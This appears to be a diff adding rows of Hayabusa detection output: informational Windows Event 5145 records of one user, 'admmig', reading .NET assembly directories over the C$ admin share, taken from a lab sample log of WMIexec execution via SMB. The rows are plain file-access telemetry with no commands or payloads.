+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
